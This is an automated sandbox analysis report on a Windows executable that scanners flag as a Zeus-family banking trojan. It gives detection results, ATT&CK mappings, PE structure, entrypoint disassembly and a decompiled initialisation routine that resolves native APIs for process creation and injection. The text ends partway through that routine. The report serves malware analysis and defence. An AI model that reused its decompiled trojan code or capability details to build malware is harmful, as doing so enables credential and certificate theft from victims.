Analysis Report RFlc8JHObG

Overview

General Information

Sample Name:RFlc8JHObG (renamed file extension from none to exe)
Analysis ID:372416
MD5:9babe52f985b2b4193113d5c260eb195
SHA1:b4b4772d485d7d4192774aca3a9c594f82717adb
SHA256:ca2ab2eb8249afceb6b9f42bac54fe8635fb5ccbf4e497c35ed700d9dae1c2d1
Tags:unnamed9

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
May initialize a security null descriptor
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • RFlc8JHObG.exe (PID: 5988 cmdline: 'C:\Users\user\Desktop\RFlc8JHObG.exe' MD5: 9BABE52F985B2B4193113D5C260EB195)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: RFlc8JHObG.exe, Avira: detected
Multi AV Scanner detection for submitted file
Source: RFlc8JHObG.exe, Virustotal: Detection: 84%
Source: RFlc8JHObG.exe, ReversingLabs: Detection: 88%
Machine Learning detection for sample
Source: RFlc8JHObG.exe, Joe Sandbox ML: detected
Source: 1.2.RFlc8JHObG.exe.2bd0000.2.unpack, Avira: Label: TR/Kazy.MK
Source: 1.2.RFlc8JHObG.exe.400000.0.unpack, Avira: Label: TR/Kazy.MK
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00409D29 CryptUnprotectData,LocalFree,1_2_00409D29
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_004123AB CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_004123AB

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Unpacked PE file: 1.2.RFlc8JHObG.exe.400000.0.unpack
Source: RFlc8JHObG.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: T:\fbgFd\faQgZ\bvjZalie\jRgyey\zBPowcgb.pdb source: RFlc8JHObG.exe
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_004054D0 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,1_2_004054D0
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0041652E PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,1_2_0041652E
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_004165E9 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,1_2_004165E9
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0041404D select,recv,1_2_0041404D
Source: RFlc8JHObG.exe, String found in binary or memory: http://www.internic.net/images/internic.gif
Source: RFlc8JHObG.exe, 00000001.00000002.200757968.0000000002BD0000.00000004.00000001.sdmp, String found in binary or memory: http://www.internic.net/images/internic.gifbclih6h5h4h3h2h1divtdtrhrbr
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0040ED74 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,PFXImportCertStore,1_2_0040ED74
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0040E904 NtQueryInformationProcess,CloseHandle,NtCreateThread,1_2_0040E904
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0040E9BB NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,1_2_0040E9BB
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00412A28 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,1_2_00412A28
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0040716E CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,1_2_0040716E
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0040D61F InitiateSystemShutdownExW,ExitWindowsEx,1_2_0040D61F
Source: RFlc8JHObG.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine, Classification label: mal76.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0040D4F4 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,1_2_0040D4F4
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0040760C CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,1_2_0040760C
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_004127D2 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,1_2_004127D2
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0040CC7E CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,GetLengthSid,CloseHandle,Process32NextW,CloseHandle,1_2_0040CC7E
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_0040A448 CoCreateInstance,1_2_0040A448
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Unpacked PE file: 1.2.RFlc8JHObG.exe.400000.0.unpack .text:ER;.data:EW;.itext:R;.rsrc:R;.idata:R; vs .text:ER;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Unpacked PE file: 1.2.RFlc8JHObG.exe.400000.0.unpack
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00414CC6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,FreeLibrary,1_2_00414CC6
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00401915 push es; iretd 1_2_00401924
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00401FE1 push cs; iretd 1_2_00401FF0
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00401FAB push cs; ret 1_2_00401FC0
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_02447857 push esi; iretd 1_2_024478AD
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_024445E5 pushfd ; iretd 1_2_024445FB
Source: initial sample, Static PE information: section name: .text entropy: 6.99040926415
Source: initial sample, Static PE information: section name: .data entropy: 7.18553169486
Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_004061F9 mov edx, dword ptr fs:[00000030h] 1_2_004061F9
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00406532 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,1_2_00406532
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_004145CF InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,1_2_004145CF
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00411208 GetSystemTime,SystemTimeToFileTime,1_2_00411208
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_004104D7 GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,1_2_004104D7
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00411230 GetTimeZoneInformation,1_2_00411230
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_004078CA GetProcAddress,GetVersionExW,1_2_004078CA
Source: RFlc8JHObG.exe, Binary or memory string: S:(ML;;NRNWNX;;;LW)
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00414400 socket,bind,closesocket,1_2_00414400
Source: C:\Users\user\Desktop\RFlc8JHObG.exe, Code function: 1_2_00414164 socket,bind,listen,closesocket,1_2_00414164

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Native API1Valid Accounts1Valid Accounts1Valid Accounts1OS Credential DumpingNetwork Share Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation11Access Token Manipulation11LSASS MemorySystem Time Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Install Root Certificate1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing23LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source          Detection  Scanner         Label
RFlc8JHObG.exe  85%        Virustotal
RFlc8JHObG.exe  88%        ReversingLabs   Win32.Trojan.Zeus
RFlc8JHObG.exe  100%       Avira           TR/Crypt.XPACK.Gen
RFlc8JHObG.exe  100%       Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source                               Detection  Scanner  Label
1.0.RFlc8JHObG.exe.400000.0.unpack   100%       Avira    TR/Crypt.XPACK.Gen
1.2.RFlc8JHObG.exe.2bd0000.2.unpack  100%       Avira    TR/Kazy.MK
1.2.RFlc8JHObG.exe.2440000.1.unpack  100%       Avira    TR/Crypt.XPACK.Gen
1.2.RFlc8JHObG.exe.400000.0.unpack   100%       Avira    TR/Kazy.MK

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name: http://www.internic.net/images/internic.gif
Source: RFlc8JHObG.exe
Malicious: false
Reputation: high

Name: http://www.internic.net/images/internic.gifbclih6h5h4h3h2h1divtdtrhrbr
Source: RFlc8JHObG.exe, 00000001.00000002.200757968.0000000002BD0000.00000004.00000001.sdmp
Malicious: false
Reputation: high

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:372416
      Start date:20.03.2021
      Start time:14:07:10
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 2m 31s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:RFlc8JHObG (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:2
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal76.evad.winEXE@1/0@0/0
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 56.5% (good quality ratio 48%)
      • Quality average: 71.2%
      • Quality standard deviation: 37.2%
      HCA Information:
      • Successful, ratio: 59%
      • Number of executed functions: 12
      • Number of non-executed functions: 124
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Stop behavior analysis, all processes terminated
      Warnings:
      • Exclude process from analysis (whitelisted): svchost.exe

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):7.186773887815174
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:RFlc8JHObG.exe
      File size:130560
      MD5:9babe52f985b2b4193113d5c260eb195
      SHA1:b4b4772d485d7d4192774aca3a9c594f82717adb
      SHA256:ca2ab2eb8249afceb6b9f42bac54fe8635fb5ccbf4e497c35ed700d9dae1c2d1
      SHA512:61f41678334ea638dd3dc02d280739910d4b64cc31289c3f99bf41067bdfee1a9ab2114920b7b162862046b06d59d2bb6168557cc1a4463113a2ad00f526af8b
      SSDEEP:3072:WhBFnGu6BYxbu75pZlgpXor85hfuHwhxqn9fI2uW+It:WhHGzK475pUpXiwgxExIt
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........9@d.j@d.j@d.j@d.jMd.jI..jQd.j[.9jOd.j[..jAd.j[..jAd.j[..jAd.jRich@d.j........PE..L....!.M...................................

      File Icon

      Icon Hash:00828e8e8686b000

      Static PE Info

      General

      Entrypoint:0x401ee0
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
      DLL Characteristics:
      Time Stamp:0x4D8C21A2 [Fri Mar 25 05:01:22 2011 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:1
      File Version Major:5
      File Version Minor:1
      Subsystem Version Major:5
      Subsystem Version Minor:1
      Import Hash:d2d0d8d094caedbfe934e30be29bea57

      Entrypoint Preview

      Instruction
      xor eax, eax
      xor eax, 000077A8h
      push ebp
      mov ebp, esp
      sub esp, 10h
      push esi
      inc esi
      mov esi, dword ptr [0043C00Ch]
      and dword ptr [0040978Dh], 004097FDh
      mov dword ptr [ebp-0Ch], C6F8E435h
      sub dword ptr [00409741h], 00000A4Ch
      push 004092F8h
      mov dword ptr [ebp-0Ch], C6F8E434h
      or dword ptr [0040974Dh], 0000382Ch
      call esi
      mov dword ptr [00409811h], 00003433h
      cmp eax, 00000498h
      jng 00007F2C58B3B831h
      sbb dword ptr [00409805h], 004097CDh
      xor eax, eax
      mov dword ptr [00409811h], 00001618h
      jmp 00007F2C58B3BA71h
      mov dword ptr [00409861h], 00001374h
      push 00409318h
      or dword ptr [00409839h], 00409815h
      call esi
      mov dword ptr [0040974Dh], 00005BB7h
      cmp eax, 00000837h
      jnl 00007F2C58B3B7CBh
      mov eax, dword ptr [0040977Dh]
      mov eax, dword ptr [0040942Ch]
      cmp eax, 919D6EFDh
      mov dword ptr [0040978Dh], 00006584h
      jne 00007F2C58B3B82Ah

      Rich Headers

      Programming Language:
      • [LNK] VS2010 SP1 build 40219
      • [RES] VS2010 SP1 build 40219
      • [EXP] VS2010 SP1 build 40219
      • [IMP] VS2008 SP1 build 30729

      Data Directories

      Name                                  Virtual Address  Virtual Size  Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT          0x3c014          0x257         .itext
      IMAGE_DIRECTORY_ENTRY_IMPORT          0x3e664          0x23c
      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3d000          0x8e8         .rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x3e000          0x638         .idata
      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
      IMAGE_DIRECTORY_ENTRY_IAT             0x3c000          0x14          .itext
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

      Sections

      Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
      .text   0x1000           0x7029        0x7200    False     0.791563870614   data       6.99040926415  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .data   0x9000           0x32f3e       0x17200   False     0.825274493243   data       7.18553169486  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .itext  0x3c000          0x26b         0x400     False     0.2412109375     data       3.78647081365  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .rsrc   0x3d000          0x8e8         0xa00     False     0.459375         data       3.29475958072  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .idata  0x3e000          0x6fe         0x800     False     0.7529296875     data       6.17155304092  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

      Resources

      Name       RVA      Size   Type  Language  Country
      RT_DIALOG  0x3d31c  0x27c  data  English   United States
      RT_DIALOG  0x3d598  0x350  data  English   United States

      Imports

      DLL           Import
      USER32.dll    GetWindowDC, IsCharAlphaNumericW
      KERNEL32.dll  lstrlenW

      Possible Origin

      Language of compilation system: English
      Country where language is spoken: United States

      Network Behavior

      No network behavior found

      Code Manipulations

      System Behavior

      General

      Start time:14:07:52
      Start date:20/03/2021
      Path:C:\Users\user\Desktop\RFlc8JHObG.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\RFlc8JHObG.exe'
      Imagebase:0x400000
      File size:130560 bytes
      MD5 hash:9BABE52F985B2B4193113D5C260EB195
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      Disassembly

      Code Analysis

        Executed Functions

        C-Code - Quality: 87%
        			E00406532(signed int** __ecx, void* __edx, signed char _a4) {
        				char _v390;
        				char _v748;
        				char _v756;
        				char _v768;
        				intOrPtr _v776;
        				intOrPtr _v780;
        				signed int _v784;
        				intOrPtr _v788;
        				signed int** _v792;
        				struct HINSTANCE__* _v796;
        				void* __edi;
        				void* __esi;
        				signed int _t40;
        				struct HINSTANCE__* _t43;
        				struct HINSTANCE__* _t47;
        				_Unknown_base(*)()* _t53;
        				void* _t54;
        				signed int _t57;
        				void** _t58;
        				void** _t60;
        				signed int _t62;
        				signed int _t65;
        				signed int _t66;
        				signed int _t68;
        				void* _t74;
        				intOrPtr _t78;
        				signed int _t79;
        				signed int _t80;
        				signed int _t81;
        				struct HINSTANCE__* _t82;
        				int _t84;
        				signed int _t87;
        				void* _t90;
        				signed int* _t92;
        				signed int _t96;
        				WCHAR* _t98;
        				void* _t99;
        				signed int* _t101;
        				void* _t110;
        				void* _t111;
        				void* _t112;
        				void* _t113;
        
        				_t90 = __edx;
        				_t88 = __ecx;
        				_t96 = _a4 & 0x00000001;
        				_v784 = _t96;
        				if(_t96 != 0) {
        					_t84 = 0;
        					__eflags = 0;
        				} else {
        					_t84 = 0;
        					 *0x41e590 = 0;
        				}
        				_t92 = E004061F9();
        				 *0x41e5a8 = _t92;
        				if(_t92 == _t84) {
        					L27:
        					_t40 = 0;
        				} else {
        					if(_t96 != _t84) {
        						_v784 = E00406133(_t88, _t90, _t92, "GetProcAddress");
        						_v784 = E00406133(_t88, _t90, _t92, "LoadLibraryA");
        						_t43 =  *0x41e5a4; // 0x400000
        						_t5 = _t43 + 0x3c; // 0xd8
        						_v796 = _t43;
        						_t88 =  *_t5 + _t43 + 0x80;
        						__eflags = _v784 - _t84;
        						if(_v784 == _t84) {
        							goto L21;
        						} else {
        							__eflags = _v780 - _t84;
        							if(_v780 == _t84) {
        								goto L21;
        							} else {
        								_t92 =  *_t88;
        								__eflags = _t92 - _t84;
        								if(_t92 <= _t84) {
        									goto L21;
        								} else {
        									__eflags = _t88[1] - 0x14;
        									if(_t88[1] <= 0x14) {
        										goto L21;
        									} else {
        										_t92 = _t92 + _t43;
        										__eflags =  *_t92 - _t84;
        										if( *_t92 == _t84) {
        											goto L21;
        										} else {
        											while(1) {
        												_t78 = _v776(_t92[3] + _v788);
        												_v776 = _t78;
        												__eflags = _t78 - _t84;
        												if(_t78 == _t84) {
        													goto L27;
        												}
        												_t101 = _v792 +  *_t92;
        												_t87 = _v792 + _t92[4];
        												while(1) {
        													_t79 =  *_t101;
        													__eflags = _t79;
        													if(__eflags == 0) {
        														break;
        													}
        													if(__eflags >= 0) {
        														_t88 = _v792;
        														_t80 =  &(_v792[0]) + _t79;
        													} else {
        														_t80 = _t79 & 0x0000ffff;
        													}
        													_t81 = _v784(_v776, _t80);
        													__eflags = _t81;
        													if(_t81 == 0) {
        														goto L27;
        													} else {
        														 *_t87 = _t81;
        														_t101 =  &(_t101[1]);
        														_t87 = _t87 + 4;
        														__eflags = _t87;
        														continue;
        													}
        													goto L47;
        												}
        												_t92 =  &(_t92[5]);
        												_t84 = 0;
        												__eflags =  *_t92;
        												if( *_t92 != 0) {
        													continue;
        												} else {
        													goto L21;
        												}
        												goto L47;
        											}
        											goto L27;
        										}
        									}
        								}
        							}
        						}
        					} else {
        						_t82 = GetModuleHandleW(_t84);
        						 *0x41e5a4 = _t82;
        						if(_t82 == _t84) {
        							goto L27;
        						} else {
        							L21:
        							_t98 =  &_v768;
        							E0040CA33(0xe5, _t98);
        							_t47 = GetModuleHandleW(_t98);
        							 *0x41e5ac = _t47;
        							if(_t47 == _t84) {
        								goto L27;
        							} else {
        								_t99 = GetProcAddress;
        								 *0x41e5b0 = GetProcAddress(_t47, "NtCreateThread");
        								 *0x41e5b4 = GetProcAddress( *0x41e5ac, "NtCreateUserProcess");
        								 *0x41e5b8 = GetProcAddress( *0x41e5ac, "NtQueryInformationProcess");
        								 *0x41e5bc = GetProcAddress( *0x41e5ac, "RtlUserThreadStart");
        								 *0x41e5c0 = GetProcAddress( *0x41e5ac, "LdrLoadDll");
        								_t53 = GetProcAddress( *0x41e5ac, "LdrGetDllHandle");
        								 *0x41e5c4 = _t53;
        								_t110 =  *0x41e5b0 - _t84; // 0x77e599e0
        								if(_t110 != 0) {
        									L24:
        									_t112 =  *0x41e5b8 - _t84; // 0x77e59670
        									if(_t112 == 0) {
        										goto L27;
        									} else {
        										_t113 =  *0x41e5c0 - _t84; // 0x77e27840
        										if(_t113 == 0 || _t53 == _t84) {
        											goto L27;
        										} else {
        											_t54 = HeapCreate(_t84, 0x80000, _t84); // executed
        											 *0x41fe64 = _t54;
        											__eflags = _t54 - _t84;
        											if(_t54 != _t84) {
        												 *0x41e403 = 1;
        											} else {
        												 *0x41fe64 = GetProcessHeap();
        												 *0x41e403 = 0;
        											}
        											 *0x41f498 = _t84;
        											 *0x41e402 = 0;
        											InitializeCriticalSection(0x41ec44);
        											 *0x41ec5c = _t84; // executed
        											__imp__#115(0x202,  &_v748); // executed
        											_t57 = E00406233(_a4, _t88, _t92, _t99);
        											__eflags = _t57;
        											if(_t57 == 0) {
        												goto L27;
        											} else {
        												__eflags = _v792 - _t84;
        												if(_v792 != _t84) {
        													L34:
        													_t58 = E0041271D(_t88, 0xffffffff, 0x41e5a0);
        													 *0x41e594 = _t58;
        													__eflags = _t58 - _t84;
        													if(_t58 == _t84) {
        														goto L27;
        													} else {
        														 *0x41e598 = GetLengthSid( *_t58);
        														_t60 =  *0x41e594; // 0x0
        														 *0x41e59c = E004124B5( *_t60, _t59);
        														_t62 = E004062B2(_t61, _a4);
        														__eflags = _t62;
        														if(_t62 == 0) {
        															goto L27;
        														} else {
        															 *0x41e800 = GetCurrentProcessId();
        															 *0x41e804 = _t84;
        															 *0x41ea4e = 0;
        															__eflags = _v792 - _t84;
        															if(_v792 != _t84) {
        																_t65 = 1;
        															} else {
        																_t65 = E00406314();
        															}
        															__eflags = _t65;
        															if(_t65 == 0) {
        																goto L27;
        															} else {
        																__eflags = _v792 - _t84;
        																if(_v792 == _t84) {
        																	E00406C9C( &_v756);
        																	_t88 = 0x41e9fe;
        																	E00415608(0x41e9fe, 0x41e808,  *0x41e59c,  &_v390, _t84);
        																}
        																_t66 = E00406366(_a4);
        																__eflags = _t66;
        																if(_t66 == 0) {
        																	goto L27;
        																} else {
        																	__eflags = _a4 & 0x00000002;
        																	 *0x41fe74 = _t84;
        																	 *0x41ec80 = 0;
        																	 *0x41ead8 = 0;
        																	 *0x41ebc0 = 0;
        																	 *0x41eb58 = 0;
        																	 *0x41e408 = 0;
        																	 *0x41e3a0 = 0;
        																	if(__eflags == 0) {
        																		_t68 = 1;
        																	} else {
        																		_t68 = E0040641D(_t88, _t90, __eflags);
        																	}
        																	__eflags = _t68;
        																	_t38 = _t68 != 0;
        																	__eflags = _t38;
        																	_t40 = _t68 & 0xffffff00 | _t38;
        																}
        															}
        														}
        													}
        												} else {
        													_t74 = CreateEventW(0x41e5c8, 1, _t84, _t84);
        													 *0x41eaa0 =  *0x41eaa0 | 0xffffffff;
        													 *0x41ea9c = _t74;
        													__eflags = _t74 - _t84;
        													if(_t74 == _t84) {
        														goto L27;
        													} else {
        														goto L34;
        													}
        												}
        											}
        										}
        									}
        								} else {
        									_t111 =  *0x41e5b4 - _t84; // 0x77e5a120
        									if(_t111 == 0) {
        										goto L27;
